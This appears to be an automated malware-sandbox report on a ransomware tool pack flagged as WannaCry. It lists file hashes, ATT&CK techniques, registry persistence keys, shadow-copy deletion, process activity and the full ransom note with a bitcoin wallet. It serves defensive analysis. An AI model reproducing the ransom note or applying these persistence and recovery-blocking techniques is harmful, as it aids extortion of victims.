wannacry | 92e603c1a66049a7a665188ecc3c161b916ba8663bc00893281d04997d701f95

Analysis

max time kernel
1049s
max time network
905s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2024 16:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware tool pack.zip
Size

308.1MB
MD5

27ddde20723c9509baed52cd5a152859
SHA1

f3dac2e94887499ee4c08b4c5fad469b79616634
SHA256

92e603c1a66049a7a665188ecc3c161b916ba8663bc00893281d04997d701f95
SHA512

25e5aa10ed609f217cbfdd67c133f9bb084b2d3928b4a6a34136b668c60ef120313c3a6a04406b71b26bdfc07c65e7de86a3fd1670de82eca403f2855122d273
SSDEEP

6291456:zMVAM35Xw9SyxlbFkMi1YckafrOs+wE9a63HMoOr3oVJzJWlsmyNHV8:YVJXgSyxlbFO1YckMy3pJOCz3T18

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware upx worm

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0009000000023c68-613.dat	acprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	ransom_builder.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDFFC2.tmp	wannacry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDFFAB.tmp	wannacry.exe

Executes dropped EXE 64 IoCs

pid	Process
3808	ransom_builder.exe
2624	Include.exe
632	upx.exe
1420	taskdl.exe
3448	@[email protected]
4304	@[email protected]
2704	taskhsvc.exe
1964	@[email protected]
4744	taskdl.exe
2828	taskse.exe
2260	@[email protected]
2208	taskdl.exe
456	taskse.exe
4928	@[email protected]
4112	taskse.exe
1760	@[email protected]
1700	taskdl.exe
1404	taskse.exe
4284	@[email protected]
2556	taskdl.exe
1604	taskse.exe
2728	@[email protected]
4832	taskdl.exe
364	taskse.exe
2192	@[email protected]
4380	taskdl.exe
4076	taskse.exe
4956	@[email protected]
1960	taskdl.exe
4384	taskse.exe
3664	@[email protected]
564	taskdl.exe
1036	taskse.exe
388	@[email protected]
2348	taskdl.exe
1680	taskse.exe
1872	@[email protected]
2648	taskdl.exe
4864	taskse.exe
1448	@[email protected]
4300	taskdl.exe
3728	taskse.exe
684	@[email protected]
852	taskdl.exe
4020	taskse.exe
3372	@[email protected]
2484	taskdl.exe
180	taskse.exe
1376	@[email protected]
2520	taskdl.exe
1576	taskse.exe
4520	@[email protected]
4008	taskdl.exe
4452	taskse.exe
1780	@[email protected]
716	taskdl.exe
3516	taskse.exe
1896	@[email protected]
544	taskdl.exe
1608	taskse.exe
1720	@[email protected]
1804	taskdl.exe
1644	taskse.exe
2624	@[email protected]

Loads dropped DLL 31 IoCs

pid	Process
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
3336	Builder.exe
2728	configuretion.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2156	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hbqpqaznjyrqx231 = "\"C:\\Users\\Admin\\Desktop\\Ransomware tool pack\\Ransomware tool pack\\ransomware virus\\wannacry\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

AutoIT Executable 10 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x004c00000002329b-550.dat	autoit_exe
behavioral2/memory/3808-662-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-673-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-704-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-698-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-687-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-679-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-670-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-667-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe
behavioral2/memory/3808-664-0x0000000000CB0000-0x0000000001102000-memory.dmp	autoit_exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	wannacry.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0017000000023c4d-581.dat	upx
behavioral2/files/0x0009000000023c68-613.dat	upx
behavioral2/memory/3808-654-0x0000000010000000-0x00000000100BB000-memory.dmp	upx
behavioral2/memory/3808-747-0x0000000010000000-0x00000000100BB000-memory.dmp	upx
behavioral2/memory/3808-1167-0x0000000010000000-0x00000000100BB000-memory.dmp	upx
behavioral2/memory/632-1170-0x0000000000400000-0x000000000057E000-memory.dmp	upx
behavioral2/memory/632-1172-0x0000000000400000-0x000000000057E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5068	powershell.exe
1684	powershell.exe
4672	powershell.exe
3192	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wannacry.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hacker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	OpenWith.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4060	reg.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3336	Builder.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2240	msedge.exe
2240	msedge.exe
4152	msedge.exe
4152	msedge.exe
264	identity_helper.exe
264	identity_helper.exe
2000	mspaint.exe
2000	mspaint.exe
3632	mspaint.exe
3632	mspaint.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
5068	powershell.exe
5068	powershell.exe
1684	powershell.exe
1684	powershell.exe
4672	powershell.exe
4672	powershell.exe
3192	powershell.exe
3192	powershell.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe
2704	taskhsvc.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
1868	7zFM.exe
3336	Builder.exe
3808	ransom_builder.exe
3496	7zFM.exe
1964	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1868	7zFM.exe
Token: 35	1868	7zFM.exe
Token: SeSecurityPrivilege	1868	7zFM.exe
Token: 35	3336	Builder.exe
Token: SeSecurityPrivilege	1868	7zFM.exe
Token: SeSecurityPrivilege	1868	7zFM.exe
Token: SeSecurityPrivilege	1868	7zFM.exe
Token: SeSecurityPrivilege	1868	7zFM.exe
Token: 33	1340	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1340	AUDIODG.EXE
Token: SeRestorePrivilege	3496	7zFM.exe
Token: 35	3496	7zFM.exe
Token: SeRestorePrivilege	920	7zG.exe
Token: 35	920	7zG.exe
Token: SeSecurityPrivilege	920	7zG.exe
Token: SeSecurityPrivilege	920	7zG.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeIncreaseQuotaPrivilege	2236	WMIC.exe
Token: SeSecurityPrivilege	2236	WMIC.exe
Token: SeTakeOwnershipPrivilege	2236	WMIC.exe
Token: SeLoadDriverPrivilege	2236	WMIC.exe
Token: SeSystemProfilePrivilege	2236	WMIC.exe
Token: SeSystemtimePrivilege	2236	WMIC.exe
Token: SeProfSingleProcessPrivilege	2236	WMIC.exe
Token: SeIncBasePriorityPrivilege	2236	WMIC.exe
Token: SeCreatePagefilePrivilege	2236	WMIC.exe
Token: SeBackupPrivilege	2236	WMIC.exe
Token: SeRestorePrivilege	2236	WMIC.exe
Token: SeShutdownPrivilege	2236	WMIC.exe
Token: SeDebugPrivilege	2236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2236	WMIC.exe
Token: SeRemoteShutdownPrivilege	2236	WMIC.exe
Token: SeUndockPrivilege	2236	WMIC.exe
Token: SeManageVolumePrivilege	2236	WMIC.exe
Token: 33	2236	WMIC.exe
Token: 34	2236	WMIC.exe
Token: 35	2236	WMIC.exe
Token: 36	2236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2236	WMIC.exe
Token: SeSecurityPrivilege	2236	WMIC.exe
Token: SeTakeOwnershipPrivilege	2236	WMIC.exe
Token: SeLoadDriverPrivilege	2236	WMIC.exe
Token: SeSystemProfilePrivilege	2236	WMIC.exe
Token: SeSystemtimePrivilege	2236	WMIC.exe
Token: SeProfSingleProcessPrivilege	2236	WMIC.exe
Token: SeIncBasePriorityPrivilege	2236	WMIC.exe
Token: SeCreatePagefilePrivilege	2236	WMIC.exe
Token: SeBackupPrivilege	2236	WMIC.exe
Token: SeRestorePrivilege	2236	WMIC.exe
Token: SeShutdownPrivilege	2236	WMIC.exe
Token: SeDebugPrivilege	2236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2236	WMIC.exe
Token: SeRemoteShutdownPrivilege	2236	WMIC.exe
Token: SeUndockPrivilege	2236	WMIC.exe
Token: SeManageVolumePrivilege	2236	WMIC.exe
Token: 33	2236	WMIC.exe
Token: 34	2236	WMIC.exe
Token: 35	2236	WMIC.exe
Token: 36	2236	WMIC.exe
Token: SeBackupPrivilege	2276	vssvc.exe
Token: SeRestorePrivilege	2276	vssvc.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1868	7zFM.exe
1868	7zFM.exe
3336	Builder.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
1868	7zFM.exe
1868	7zFM.exe
1868	7zFM.exe
1868	7zFM.exe
1868	7zFM.exe
1868	7zFM.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe

Suspicious use of SendNotifyMessage 55 IoCs

pid	Process
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
4152	msedge.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe
3808	ransom_builder.exe

Suspicious use of SetWindowsHookEx 50 IoCs

pid	Process
3336	Builder.exe
5036	OpenWith.exe
3812	OpenWith.exe
2000	mspaint.exe
448	OpenWith.exe
3632	mspaint.exe
1948	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
2728	OpenWith.exe
3808	ransom_builder.exe
1812	OpenWith.exe
3448	@[email protected]
3448	@[email protected]
4304	@[email protected]
4304	@[email protected]
1964	@[email protected]
1964	@[email protected]
2260	@[email protected]
4928	@[email protected]
1760	@[email protected]
4284	@[email protected]
2728	@[email protected]
2192	@[email protected]
4956	@[email protected]
3664	@[email protected]
388	@[email protected]
1872	@[email protected]
1448	@[email protected]
684	@[email protected]
3372	@[email protected]
1376	@[email protected]
4520	@[email protected]
1780	@[email protected]
1896	@[email protected]
1720	@[email protected]
2624	@[email protected]
692	@[email protected]
2360	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 720 wrote to memory of 3336	720	Builder.exe	99
PID 720 wrote to memory of 3336	720	Builder.exe	99
PID 2800 wrote to memory of 2728	2800	configuretion.exe	103
PID 2800 wrote to memory of 2728	2800	configuretion.exe	103
PID 2728 wrote to memory of 4152	2728	configuretion.exe	104
PID 2728 wrote to memory of 4152	2728	configuretion.exe	104
PID 2728 wrote to memory of 2628	2728	configuretion.exe	105
PID 2728 wrote to memory of 2628	2728	configuretion.exe	105
PID 4152 wrote to memory of 2548	4152	msedge.exe	106
PID 4152 wrote to memory of 2548	4152	msedge.exe	106
PID 2728 wrote to memory of 1920	2728	configuretion.exe	107
PID 2728 wrote to memory of 1920	2728	configuretion.exe	107
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 3468	4152	msedge.exe	108
PID 4152 wrote to memory of 2240	4152	msedge.exe	109
PID 4152 wrote to memory of 2240	4152	msedge.exe	109
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110
PID 4152 wrote to memory of 4976	4152	msedge.exe	110

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
